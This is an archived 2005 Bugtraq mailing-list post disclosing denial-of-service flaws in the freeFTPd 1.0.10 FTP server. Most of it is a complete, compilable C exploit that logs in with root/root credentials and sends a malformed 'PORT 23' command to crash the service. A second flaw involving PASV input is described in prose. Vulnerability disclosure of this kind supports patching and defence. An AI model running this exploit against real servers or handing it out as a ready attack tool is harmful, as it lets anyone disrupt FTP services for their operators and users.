lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 24 Nov 2005 08:48:33 +0100
From: Stefan Lochbihler <steve01@...llo.at>
To: bugtraq@...urityfocus.com
Subject: freeFTPd 1.0.10  (Dos,Exploit)


Author:         Stefan Lochbihler
Date:            24. November 2005
Software:      freeFTPd
Version:       1.0.10
URL:            http://freeftpd.com/
Attack:         Denial of service



about:
freeFTPd is a FTP/FTPS/SFTP server that enables user to
access remote files over TCP/IP network such as Internet.
Unlike FTP, FTPS and SFTP protocols provide security and
strong encryption of data - great for insecure network.


info:
During some tests on the freeftpd project i find out that
it is vulnerable to the following attacks.

[1]

First a loged on user is able to crash the service
if he send a port command and append some numbers.

f.e.
PORT 123

(see exploit section for more details)

[2]

If we send a PASV command with user supplied data
for a period of time the server also freeze.



exploit:

// freeFTPd Denial of Service Attack
// Tested on a Win XP Sp1 Box


#include "stdio.h"
#include "winsock2.h"
#pragma comment (lib,"ws2_32")


#define PORT 21
#define USER "root"
#define PASS "root"
#define L    "--------------------------------------------------"
#define HL   "freeFTPd (1.0.10) DoS Exploit by steve01@...llo.at"
#define BOOM "23"

typedef unsigned long ulong;
ulong resolv_host(char *);

int main(int argc, char* argv[])
{

    WSADATA wsa;
    SOCKET s_target;
    struct sockaddr_in addr;
    WORD wsVersion;
    int err=0;

    if(argc<2)
    {
        printf("%s\n",L);
        printf("%s\n",HL);
        printf("%s\n",L);
        printf("Usage: %s <www.target.com>\n",argv[0]);
        exit(0);
    }

    printf("%s\n",L);
    printf("%s\n",HL);
    printf("%s\n",L);


    if(WSAStartup(wsVersion=MAKEWORD(2,2),&wsa))
    {
        printf("Error WSAStartup() Error Code: %d\n",WSAGetLastError());
        exit(1);
    }


    
    s_target=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if(s_target==INVALID_SOCKET)
    {
        printf("Error socket() Error Code: %d\n",WSAGetLastError());
        exit(2);
    }
    
    
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr= resolv_host(argv[1]);

    if(connect(s_target,(SOCKADDR *)&addr,sizeof(addr)))
    {
        printf("Error connect() Error Code: %d\n",WSAGetLastError());
        exit(3);
    }

    int recvsize=0;
    char recvbuffer[400];
    char sendbuffer[400];

    //recv banner
    recvsize=recv(s_target,recvbuffer,sizeof(recvbuffer)-1,0);
    recvbuffer[recvsize]='\0';
    //send user
    strncpy(sendbuffer,"USER ",sizeof(sendbuffer)-1);
    strncat(sendbuffer,USER,sizeof(sendbuffer)-strlen(sendbuffer)-1);
    strncat(sendbuffer,"\r\n",sizeof(sendbuffer)-strlen(sendbuffer)-1);

    send(s_target,sendbuffer,strlen(sendbuffer),0);

    //recv user stuff
    recvsize=recv(s_target,recvbuffer,sizeof(recvbuffer)-1,0);
    recvbuffer[recvsize]='\0';

    strncpy(sendbuffer,"PASS ",sizeof(sendbuffer)-1);
    strncat(sendbuffer,PASS,sizeof(sendbuffer)-strlen(sendbuffer)-1);
    strncat(sendbuffer,"\r\n",sizeof(sendbuffer)-strlen(sendbuffer)-1);

    //send pass
    send(s_target,sendbuffer,strlen(sendbuffer),0);

    //recv pass stuff
    recvsize=recv(s_target,recvbuffer,sizeof(recvbuffer)-1,0);
    recvbuffer[recvsize]='\0';

    strncpy(sendbuffer,"PORT ",sizeof(sendbuffer)-1);
    strncat(sendbuffer,BOOM,sizeof(sendbuffer)-strlen(sendbuffer)-1);
    strncat(sendbuffer,"\r\n",sizeof(sendbuffer)-strlen(sendbuffer)-1);
    send(s_target,sendbuffer,strlen(sendbuffer),0);


    closesocket(s_target);
    WSACleanup();
    


    return 0;
}


ulong resolv_host(char *host)
{

ulong uhost=0;
struct hostent *th;

uhost=inet_addr(host);
if(uhost==INADDR_NONE)
{
  th=gethostbyname(host);
  if(!th)
  {
    printf("Check if %s is up \n",host);
    exit(0);
  }
 
  uhost=*(unsigned long*)th->h_addr;

}



return uhost;


}


-------------------------------------------------------------------------------


Vendor Status: No vendor response !


Discovered and copyright by Stefan Lochbihler



Powered by blists - more mailing lists